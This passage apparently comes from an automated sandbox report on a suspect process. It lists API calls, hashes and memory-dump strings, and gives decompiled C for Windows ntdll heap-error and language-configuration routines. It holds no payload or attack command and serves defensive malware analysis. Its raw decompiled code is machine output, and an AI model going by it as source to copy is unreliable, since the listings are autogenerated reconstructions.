              • Opcode Fuzzy Hash: bcc55e10a08d8f04f23789298421292f34d70b37254d9ad75765260922da6336
              • Instruction Fuzzy Hash: CEE092333C131437E36065A99C02FE7B78CDB84B64F55402AFB4DEB2C1E595F90146A4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02EFA64D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
              • Instruction ID: fdf2f35fa77b238a7c2836709b88ad677359463e1082dae1abc3d55bf062b080
              • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
              • Instruction Fuzzy Hash: 28E012B2200208ABDB14EF89DC48EA737ADEF88750F118158BA085B341C630E9108AB0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EED5B2,02EED5B2,?,00000000,?,?), ref: 02EFA7B0
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
              • Instruction ID: c2264ccb53fb4afd1478eb7f3d69f7a82c923efd48a79d128829e56507350c7e
              • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
              • Instruction Fuzzy Hash: 39E01AB22402086BDB10DF49CC44EE737ADEF89654F118164BA0C5B341C530E8148AB1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlAllocateHeap.NTDLL(02EF5176,?,02EF58EF,02EF58EF,?,02EF5176,?,?,?,?,?,00000000,00000005,00000206), ref: 02EFA60D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
              • Instruction ID: 0d04463c694ffa205cbe9d1100d2b83253782c0e4f70317c372b9da78f88b623
              • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
              • Instruction Fuzzy Hash: C7E012B2200208ABDB14EF89DC84EAB37ADEF88654F118154BA085B341CA30F9108AB0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02EFA64D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 96173d2900e5245124899023fb580c87ea31872047d3a5cd8ef449baf5e8c916
              • Instruction ID: e54fb19b7a388c5937fa425432eadb00094dc094f597cd90d2740a199f20d563
              • Opcode Fuzzy Hash: 96173d2900e5245124899023fb580c87ea31872047d3a5cd8ef449baf5e8c916
              • Instruction Fuzzy Hash: F1E046B2200204AFDB14DF59DC48EE73B69EF88350F118158FA0C9B341C630E910CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlAllocateHeap.NTDLL(02EF5176,?,02EF58EF,02EF58EF,?,02EF5176,?,?,?,?,?,00000000,00000005,00000206), ref: 02EFA60D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction ID: 48fe6523a97866b10478ae9bedf8756d0aa7533a70472703e2fc5765403e17dc
              • Opcode Fuzzy Hash: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction Fuzzy Hash: 28D0957F0445521BF752F3A05D808F2370DE5C525D32CAC95D5CD0F149C411404547E0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,02EE8233,?), ref: 02EEDA4B
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
              • Instruction ID: 55f5c8e49cd288188aba6925878eef63a9550ef6516891fd052f2ec65d54bf70
              • Opcode Fuzzy Hash: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
              • Instruction Fuzzy Hash: 73D0A77168030477FE10E6E48C43F2636CC9B48A44F458064FA0DDB3C2EA60F1104564
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,02EE8233,?), ref: 02EEDA4B
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 588910df517dd3444f402f0a84021eee09c58ae95d64afcc9ffe1e84b71307d9
              • Instruction ID: 1009691f83314daef7ec003b5f390c0b5f34ed7b97f872b9efbd5a4a0d8d4709
              • Opcode Fuzzy Hash: 588910df517dd3444f402f0a84021eee09c58ae95d64afcc9ffe1e84b71307d9
              • Instruction Fuzzy Hash: 7BC0C0C38C830203FD01D1F03C0271B440D1A9051CB0CD144F40DC4183F710C1200021
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 944d786986ae0bd03e762eda9e50bdb0877064a6053b5836fd48a101b0df82c8
              • Instruction ID: 80b4861fc4d14b5fbfc2baeee482f7efc97bba03b29ff47f61112db0c2d1337d
              • Opcode Fuzzy Hash: 944d786986ae0bd03e762eda9e50bdb0877064a6053b5836fd48a101b0df82c8
              • Instruction Fuzzy Hash: B9B09BF19014D5C5F751D76046087177E1177D1745F26C551D1030645B4778E191F5B5
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              • an invalid address, %p, xrefs: 04C7B4CF
              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04C7B47D
              • The instruction at %p tried to %s , xrefs: 04C7B4B6
              • a NULL pointer, xrefs: 04C7B4E0
              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C7B38F
              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04C7B39B
              • *** then kb to get the faulting stack, xrefs: 04C7B51C
              • The critical section is owned by thread %p., xrefs: 04C7B3B9
              • Go determine why that thread has not released the critical section., xrefs: 04C7B3C5
              • *** An Access Violation occurred in %ws:%s, xrefs: 04C7B48F
              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04C7B484
              • This failed because of error %Ix., xrefs: 04C7B446
              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04C7B314
              • The resource is owned exclusively by thread %p, xrefs: 04C7B374
              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C7B3D6
              • The resource is owned shared by %d threads, xrefs: 04C7B37E
              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04C7B2F3
              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04C7B305
              • *** Resource timeout (%p) in %ws:%s, xrefs: 04C7B352
              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04C7B2DC
              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04C7B323
              • *** enter .exr %p for the exception record, xrefs: 04C7B4F1
              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04C7B476
              • *** enter .cxr %p for the context, xrefs: 04C7B50D
              • read from, xrefs: 04C7B4AD, 04C7B4B2
              • write to, xrefs: 04C7B4A6
              • <unknown>, xrefs: 04C7B27E, 04C7B2D1, 04C7B350, 04C7B399, 04C7B417, 04C7B48E
              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04C7B53F
              • The instruction at %p referenced memory at %p., xrefs: 04C7B432
              • *** Inpage error in %ws:%s, xrefs: 04C7B418
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
              • API String ID: 0-108210295
              • Opcode ID: 67227fbf2a3aad3a5da24145d23b5582120a366a79d2b934dc6d5fd90a5ceb74
              • Instruction ID: 3ebb941afca3e67b1007110e8460ba7314f25eefa064824635c901a085f77264
              • Opcode Fuzzy Hash: 67227fbf2a3aad3a5da24145d23b5582120a366a79d2b934dc6d5fd90a5ceb74
              • Instruction Fuzzy Hash: BE811335A40200FFEB255A058C45DBF3F2BEF46B99F444084F5052B131F7A5B991EAB6
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 44%
              			E04C81C06() {
              				signed int _t27;
              				char* _t104;
              				char* _t105;
              				intOrPtr _t113;
              				intOrPtr _t115;
              				intOrPtr _t117;
              				intOrPtr _t119;
              				intOrPtr _t120;
              
              				_t105 = 0x4ba48a4;
              				_t104 = "HEAP: ";
              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              					_push(_t104);
              					E04BCB150();
              				} else {
              					E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              				}
              				_push( *0x4cb589c);
              				E04BCB150("Heap error detected at %p (heap handle %p)\n",  *0x4cb58a0);
              				_t27 =  *0x4cb5898; // 0x0
              				if(_t27 <= 0xf) {
              					switch( *((intOrPtr*)(_t27 * 4 +  &M04C81E96))) {
              						case 0:
              							_t105 = "heap_failure_internal";
              							goto L21;
              						case 1:
              							goto L21;
              						case 2:
              							goto L21;
              						case 3:
              							goto L21;
              						case 4:
              							goto L21;
              						case 5:
              							goto L21;
              						case 6:
              							goto L21;
              						case 7:
              							goto L21;
              						case 8:
              							goto L21;
              						case 9:
              							goto L21;
              						case 0xa:
              							goto L21;
              						case 0xb:
              							goto L21;
              						case 0xc:
              							goto L21;
              						case 0xd:
              							goto L21;
              						case 0xe:
              							goto L21;
              						case 0xf:
              							goto L21;
              					}
              				}
              				L21:
              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              					_push(_t104);
              					E04BCB150();
              				} else {
              					E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              				}
              				_push(_t105);
              				E04BCB150("Error code: %d - %s\n",  *0x4cb5898);
              				_t113 =  *0x4cb58a4; // 0x0
              				if(_t113 != 0) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E04BCB150();
              					} else {
              						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E04BCB150("Parameter1: %p\n",  *0x4cb58a4);
              				}
              				_t115 =  *0x4cb58a8; // 0x0
              				if(_t115 != 0) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E04BCB150();
              					} else {
              						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E04BCB150("Parameter2: %p\n",  *0x4cb58a8);
              				}
              				_t117 =  *0x4cb58ac; // 0x0
              				if(_t117 != 0) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E04BCB150();
              					} else {
              						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E04BCB150("Parameter3: %p\n",  *0x4cb58ac);
              				}
              				_t119 =  *0x4cb58b0; // 0x0
              				if(_t119 != 0) {
              					L41:
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E04BCB150();
              					} else {
              						E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					_push( *0x4cb58b4);
              					E04BCB150("Last known valid blocks: before - %p, after - %p\n",  *0x4cb58b0);
              				} else {
              					_t120 =  *0x4cb58b4; // 0x0
              					if(_t120 != 0) {
              						goto L41;
              					}
              				}
              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              					_push(_t104);
              					E04BCB150();
              				} else {
              					E04BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              				}
              				return E04BCB150("Stack trace available at %p\n", 0x4cb58c0);
              			}

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
              • API String ID: 0-2897834094
              • Opcode ID: 572e44521b228ee5e763ea95e0f1834ac1a6c86a9b8e6d92600ea0898dd93ab8
              • Instruction ID: 9644c4585fc4af74f4c32d2f5537d914357b9ec81bc1bbbaa8ce9f88cfa8ea28
              • Opcode Fuzzy Hash: 572e44521b228ee5e763ea95e0f1834ac1a6c86a9b8e6d92600ea0898dd93ab8
              • Instruction Fuzzy Hash: FC61E637664150DFE211BB85E485F7873E9EB04A39B0D80EEF44A5B320DA65FC528E89
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E04BD3D34(signed int* __ecx) {
              				signed int* _v8;
              				char _v12;
              				signed int* _v16;
              				signed int* _v20;
              				char _v24;
              				signed int _v28;
              				signed int _v32;
              				char _v36;
              				signed int _v40;
              				signed int _v44;
              				signed int* _v48;
              				signed int* _v52;
              				signed int _v56;
              				signed int _v60;
              				char _v68;
              				signed int _t140;
              				signed int _t161;
              				signed int* _t236;
              				signed int* _t242;
              				signed int* _t243;
              				signed int* _t244;
              				signed int* _t245;
              				signed int _t255;
              				void* _t257;
              				signed int _t260;
              				void* _t262;
              				signed int _t264;
              				void* _t267;
              				signed int _t275;
              				signed int* _t276;
              				short* _t277;
              				signed int* _t278;
              				signed int* _t279;
              				signed int* _t280;
              				short* _t281;
              				signed int* _t282;
              				short* _t283;
              				signed int* _t284;
              				void* _t285;
              
              				_v60 = _v60 | 0xffffffff;
              				_t280 = 0;
              				_t242 = __ecx;
              				_v52 = __ecx;
              				_v8 = 0;
              				_v20 = 0;
              				_v40 = 0;
              				_v28 = 0;
              				_v32 = 0;
              				_v44 = 0;
              				_v56 = 0;
              				_t275 = 0;
              				_v16 = 0;
              				if(__ecx == 0) {
              					_t280 = 0xc000000d;
              					_t140 = 0;
              					L50:
              					 *_t242 =  *_t242 | 0x00000800;
              					_t242[0x13] = _t140;
              					_t242[0x16] = _v40;
              					_t242[0x18] = _v28;
              					_t242[0x14] = _v32;
              					_t242[0x17] = _t275;
              					_t242[0x15] = _v44;
              					_t242[0x11] = _v56;
              					_t242[0x12] = _v60;
              					return _t280;
              				}
              				if(E04BD1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
              					_v56 = 1;
              					if(_v8 != 0) {
              						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
              					}
              					_v8 = _t280;
              				}
              				if(E04BD1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
              					_v60 =  *_v8;
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
              					_v8 = _t280;
              				}
              				if(E04BD1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
              					L16:
              					if(E04BD1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
              						L28:
              						if(E04BD1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
              							L46:
              							_t275 = _v16;
              							L47:
              							_t161 = 0;
              							L48:
              							if(_v8 != 0) {
              								L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
              							}
              							_t140 = _v20;
              							if(_t140 != 0) {
              								if(_t275 != 0) {
              									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
              									_t275 = 0;
              									_v28 = 0;
              									_t140 = _v20;
              								}
              							}
              							goto L50;
              						}
              						_t167 = _v12;
              						_t255 = _v12 + 4;
              						_v44 = _t255;
              						if(_t255 == 0) {
              							_t276 = _t280;
              							_v32 = _t280;
              						} else {
              							_t276 = L04BE4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
              							_t167 = _v12;
              							_v32 = _t276;
              						}
              						if(_t276 == 0) {
              							_v44 = _t280;
              							_t280 = 0xc0000017;
              							goto L46;
              						} else {
              							E04C0F3E0(_t276, _v8, _t167);
              							_v48 = _t276;
              							_t277 = E04C11370(_t276, 0x4ba4e90);
              							_pop(_t257);
              							if(_t277 == 0) {
              								L38:
              								_t170 = _v48;
              								if( *_v48 != 0) {
              									E04C0BB40(0,  &_v68, _t170);
              									if(L04BD43C0( &_v68,  &_v24) != 0) {
              										_t280 =  &(_t280[0]);
              									}
              								}
              								if(_t280 == 0) {
              									_t280 = 0;
              									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
              									_v44 = 0;
              									_v32 = 0;
              								} else {
              									_t280 = 0;
              								}
              								_t174 = _v8;
              								if(_v8 != 0) {
              									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
              								}
              								_v8 = _t280;
              								goto L46;
              							}
              							_t243 = _v48;
              							do {
              								 *_t277 = 0;
              								_t278 = _t277 + 2;
              								E04C0BB40(_t257,  &_v68, _t243);
              								if(L04BD43C0( &_v68,  &_v24) != 0) {
              									_t280 =  &(_t280[0]);
              								}
              								_t243 = _t278;
              								_t277 = E04C11370(_t278, 0x4ba4e90);
              								_pop(_t257);
              							} while (_t277 != 0);
              							_v48 = _t243;
              							_t242 = _v52;
              							goto L38;
              						}
              					}
              					_t191 = _v12;
              					_t260 = _v12 + 4;
              					_v28 = _t260;
              					if(_t260 == 0) {
              						_t275 = _t280;
              						_v16 = _t280;
              					} else {
              						_t275 = L04BE4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
              						_t191 = _v12;
              						_v16 = _t275;
              					}
              					if(_t275 == 0) {
              						_v28 = _t280;
              						_t280 = 0xc0000017;
              						goto L47;
              					} else {
              						E04C0F3E0(_t275, _v8, _t191);
              						_t285 = _t285 + 0xc;
              						_v48 = _t275;
              						_t279 = _t280;
              						_t281 = E04C11370(_v16, 0x4ba4e90);
              						_pop(_t262);
              						if(_t281 != 0) {
              							_t244 = _v48;
              							do {
              								 *_t281 = 0;
              								_t282 = _t281 + 2;
              								E04C0BB40(_t262,  &_v68, _t244);
              								if(L04BD43C0( &_v68,  &_v24) != 0) {
              									_t279 =  &(_t279[0]);
              								}
              								_t244 = _t282;
              								_t281 = E04C11370(_t282, 0x4ba4e90);
              								_pop(_t262);
              							} while (_t281 != 0);
              							_v48 = _t244;
              							_t242 = _v52;
              						}
              						_t201 = _v48;
              						_t280 = 0;
              						if( *_v48 != 0) {
              							E04C0BB40(_t262,  &_v68, _t201);
              							if(L04BD43C0( &_v68,  &_v24) != 0) {
              								_t279 =  &(_t279[0]);
              							}
              						}
              						if(_t279 == 0) {
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
              							_v28 = _t280;
              							_v16 = _t280;
              						}
              						_t202 = _v8;
              						if(_v8 != 0) {
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
              						}
              						_v8 = _t280;
              						goto L28;
              					}
              				}
              				_t214 = _v12;
              				_t264 = _v12 + 4;
              				_v40 = _t264;
              				if(_t264 == 0) {
              					_v20 = _t280;
              				} else {
              					_t236 = L04BE4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
              					_t280 = _t236;
              					_v20 = _t236;
              					_t214 = _v12;
              				}
              				if(_t280 == 0) {
              					_t161 = 0;
              					_t280 = 0xc0000017;
              					_v40 = 0;
              					goto L48;
              				} else {
              					E04C0F3E0(_t280, _v8, _t214);
              					_t285 = _t285 + 0xc;
              					_v48 = _t280;
              					_t283 = E04C11370(_t280, 0x4ba4e90);
              					_pop(_t267);
              					if(_t283 != 0) {
              						_t245 = _v48;
              						do {
              							 *_t283 = 0;
              							_t284 = _t283 + 2;
              							E04C0BB40(_t267,  &_v68, _t245);
              							if(L04BD43C0( &_v68,  &_v24) != 0) {
              								_t275 = _t275 + 1;
              							}
              							_t245 = _t284;
              							_t283 = E04C11370(_t284, 0x4ba4e90);
              							_pop(_t267);
              						} while (_t283 != 0);
              						_v48 = _t245;
              						_t242 = _v52;
              					}
              					_t224 = _v48;
              					_t280 = 0;
              					if( *_v48 != 0) {
              						E04C0BB40(_t267,  &_v68, _t224);
              						if(L04BD43C0( &_v68,  &_v24) != 0) {
              							_t275 = _t275 + 1;
              						}
              					}
              					if(_t275 == 0) {
              						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
              						_v40 = _t280;
              						_v20 = _t280;
              					}
              					_t225 = _v8;
              					if(_v8 != 0) {
              						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
              					}
              					_v8 = _t280;
              					goto L16;
              				}
              			}

              Strings
              • Kernel-MUI-Number-Allowed, xrefs: 04BD3D8C
              • Kernel-MUI-Language-SKU, xrefs: 04BD3F70
              • Kernel-MUI-Language-Disallowed, xrefs: 04BD3E97
              • Kernel-MUI-Language-Allowed, xrefs: 04BD3DC0
              • WindowsExcludedProcs, xrefs: 04BD3D6F
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              • Opcode ID: 36155f220c491515a86a21f64f4c908ed059e15f6f9325aa19999c0a9a0667e3
              • Instruction ID: 5876cfe4ab29925eb29a60be42520e8b777be6187e36a8fa9cdd6fcdb5558337
              • Opcode Fuzzy Hash: 36155f220c491515a86a21f64f4c908ed059e15f6f9325aa19999c0a9a0667e3
              • Instruction Fuzzy Hash: AFF16072D00219EFDB15DF98C940AEEBBB9FF48750F1401AAE905A7251E774AE00DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E04BD7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				char _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				char _v24;
              				signed int _t73;
              				void* _t77;
              				char* _t82;
              				char* _t87;
              				signed char* _t97;
              				signed char _t102;
              				intOrPtr _t107;
              				signed char* _t108;
              				intOrPtr _t112;
              				intOrPtr _t124;
              				intOrPtr _t125;
              				intOrPtr _t126;
              
              				_t107 = __edx;
              				_v12 = __ecx;
              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
              				_t124 = 0;
              				_v20 = __edx;
              				if(E04BDCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
              					_t112 = _v8;
              				} else {
              					_t112 = 0;
              					_v8 = 0;
              				}
              				if(_t112 != 0) {
              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
              						_t124 = 0xc000007b;
              						goto L8;
              					}
              					_t73 =  *(_t125 + 0x34) | 0x00400000;
              					 *(_t125 + 0x34) = _t73;
              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
              						goto L3;
              					}
              					 *(_t125 + 0x34) = _t73 | 0x01000000;
              					_t124 = E04BCC9A4( *((intOrPtr*)(_t125 + 0x18)));
              					if(_t124 < 0) {
              						goto L8;
              					} else {
              						goto L3;
              					}
              				} else {
              					L3:
              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
              						L8:
              						return _t124;
              					}
              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
              							goto L5;
              						}
              						_t102 =  *0x4cb5780; // 0x0
              						if((_t102 & 0x00000003) != 0) {
